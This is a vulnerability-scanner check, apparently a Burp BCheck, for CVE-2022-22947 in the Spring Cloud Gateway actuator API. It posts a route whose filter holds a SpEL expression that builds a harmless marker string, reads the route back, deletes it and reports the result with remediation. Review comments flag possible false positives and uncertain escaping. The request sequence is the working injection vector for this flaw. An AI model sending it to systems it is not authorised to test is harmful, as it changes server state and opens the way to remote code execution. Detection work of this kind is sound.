CVE-2022-22947-spring_cloud_gateway_actuator_api_rce.bcheck
metadata:
    # Host-level BCheck for CVE-2022-22947 (Spring Cloud Gateway actuator API).
    # This is an active check: it creates a temporary route through the actuator
    # API, triggers a refresh, reads the route back and then deletes it, so it
    # changes state on the target gateway while it runs.
    language: v1-beta
    name: "CVE-2022-22947 Spring Cloud Gateway Actuator API RCE"
    description: "find CVE-2022-22947 Spring Cloud Gateway Actuator API RCE"
    author: "timeshatter"
    tags: "Spring Cloud Gateway Actuator API RCE", "CVE-2022-22947"
define:
    # Path of the gateway actuator route listing, used by the first probe request.
    routes = "/actuator/gateway/routes/"
    # JSON route definition sent as the probe body. Its AddResponseHeader filter
    # value is a SpEL expression that only constructs the constant string
    # "vuln is true"; the check later looks for that string when it reads the
    # route back.
    # NOTE(review): the marker text also appears verbatim inside this body, so a
    # server that returns the stored definition without evaluating it would match
    # as well. A marker whose evaluated form differs from the submitted text would
    # make the result less ambiguous.
    # NOTE(review): the "id" field is "vulntest" while the second pass posts to
    # .../appendvulntest. Confirm which id the server actually stores.
    # NOTE(review): the \\" sequences may be an artefact of how this page was
    # rendered; verify the escaping against the original file before use.
    poc = "{\"id\": \"vulntest\",\"filters\": [{\"name\": \"AddResponseHeader\",\"args\": {\"name\": \"Result\",\"value\": \"#{new String(\\"vuln is true\\")}\"}}],\"uri\": \"http://example.com\"}"
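given host then
    # Pass 1: probe the actuator at the web root.
    # Nothing is written to the target unless the route listing answers with
    # 200 and a response containing "application/json".
    send request called check:
        method: "GET"
        path: {routes}

    if {check.response.status_code} is "200" and "application/json" in {check.response} then
        # State-changing step: registers a temporary route named "vulntest".
        send request called check1:
            method: "POST"
            path: "/actuator/gateway/routes/vulntest"
            headers: "Content-Type":"application/json"
            body: {poc}

        if {check1.response.status_code} is "201" then
            send request called check2:
                method: "POST"
                path: "/actuator/gateway/refresh"

            send request called check3:
                method: "GET"
                path: "/actuator/gateway/routes/vulntest"

            # Cleanup runs whenever the route was created (201), not only when the
            # marker was found. Previously a failed refresh or a missing marker left
            # the "vulntest" route behind on the scanned gateway.
            # Cleanup is sent before the issue is reported so that it does not
            # depend on anything that happens after reporting.
            send request:
                method: "DELETE"
                path: "/actuator/gateway/routes/vulntest"

            send request:
                method: "POST"
                path: "/actuator/gateway/refresh"

            # Same reporting condition as before: refresh succeeded and the marker
            # is present in the route read back from the server.
            # NOTE(review): the marker also occurs verbatim in the submitted body, so
            # an unevaluated echo of the definition would match too. Confirm that
            # "certain" is justified, or use a marker that only appears after
            # evaluation.
            if {check2.response.status_code} is "200" and "vuln is true" in {check3.response} then
                report issue:
                    severity: high
                    confidence: certain
                    detail: "The gateway actuator API accepted a new route definition and, after a refresh, the route read back contained the test marker from a SpEL expression placed in a filter argument (CVE-2022-22947). A DELETE was sent for the temporary route vulntest; confirm it no longer appears under /actuator/gateway/routes."
                    remediation: "Upgrade Spring Cloud Gateway to a release that fixes CVE-2022-22947. If the gateway actuator endpoint is not needed, disable it (management.endpoint.gateway.enabled=false); otherwise restrict access to it with authentication."
            end if
        end if
    end if

    # Pass 2: the same sequence with the actuator path appended to the base
    # request path, for gateways that are not mounted at the web root. It uses a
    # separate route name ("appendvulntest") so the two passes do not collide.
    send request called appendcheck:
        method: "GET"
        appending path: "actuator/gateway/routes/"

    if {appendcheck.response.status_code} is "200" and "application/json" in {appendcheck.response} then
        # State-changing step: registers a temporary route named "appendvulntest".
        send request called appendcheck1:
            method: "POST"
            appending path: "actuator/gateway/routes/appendvulntest"
            headers: "Content-Type":"application/json"
            body: {poc}

        if {appendcheck1.response.status_code} is "201" then
            send request called appendcheck2:
                method: "POST"
                appending path: "actuator/gateway/refresh"

            send request called appendcheck3:
                method: "GET"
                appending path: "actuator/gateway/routes/appendvulntest"

            # Cleanup runs whenever the route was created, as in pass 1.
            send request:
                method: "DELETE"
                appending path: "actuator/gateway/routes/appendvulntest"

            send request:
                method: "POST"
                appending path: "actuator/gateway/refresh"

            if {appendcheck2.response.status_code} is "200" and "vuln is true" in {appendcheck3.response} then
                report issue:
                    severity: high
                    confidence: certain
                    detail: "The gateway actuator API accepted a new route definition and, after a refresh, the route read back contained the test marker from a SpEL expression placed in a filter argument (CVE-2022-22947). A DELETE was sent for the temporary route appendvulntest; confirm it no longer appears under the actuator/gateway/routes path."
                    remediation: "Upgrade Spring Cloud Gateway to a release that fixes CVE-2022-22947. If the gateway actuator endpoint is not needed, disable it (management.endpoint.gateway.enabled=false); otherwise restrict access to it with authentication."
            end if
        end if
    end if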